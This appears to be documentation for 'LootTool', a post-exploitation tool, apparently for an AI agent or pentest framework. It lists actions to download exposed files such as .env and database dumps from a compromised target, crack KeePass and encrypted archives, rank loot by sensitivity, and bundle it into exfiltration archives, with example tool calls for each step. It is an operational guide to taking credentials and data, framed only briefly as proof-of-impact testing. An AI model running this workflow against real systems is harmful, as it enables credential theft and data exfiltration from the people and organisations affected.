LootTool — Loot Collection
LootTool automates post-exploitation loot collection: downloading exposed files, cracking encrypted artifacts, classifying sensitivity, and building exfiltration archives.
Actions
| Action | Purpose |
|---|---|
collect | Download files from target using URLs |
crack | Attempt to crack encrypted files (KeePass, etc.) |
classify | Classify file sensitivity |
archive | Create tar.gz of all collected loot |
report | Generate loot inventory report |
Sensitivity Levels
| Level | Label | Examples |
|---|---|---|
| 0 | public | Publicly available information |
| 1 | internal | Internal documentation, non-sensitive |
| 2 | confidential | Business data, internal communications |
| 3 | restricted | PII, credentials, financial data |
| 4 | top-secret | Encryption keys, root access, crown jewels |
Usage
Collecting files
LootTool(
action="collect",
target="http://target.com",
urls=[
"http://target.com/.env",
"http://target.com/backup/database.sql"
],
authToken="Bearer eyJ..."
)Cracking encrypted files
LootTool(
action="crack",
files=[
{"path": "./loot/keepass.kdbx", "type": "keepass"},
{"path": "./loot/encrypted.zip", "type": "encrypted"}
]
)Classifying files
LootTool(
action="classify",
files=[
{"path": "./loot/.env", "type": "text"},
{"path": "./loot/database.sql", "type": "sql"}
]
)Creating exfiltration archive
LootTool(action="archive")Generating loot report
LootTool(action="report")Loot Flow
- Collect — Download accessible files from the compromised target
- Crack — Break any encrypted files discovered
- Classify — Assign sensitivity levels to every file
- Archive — Bundle into a tar.gz for proof-of-impact
- Report — Generate inventory with sensitivity classification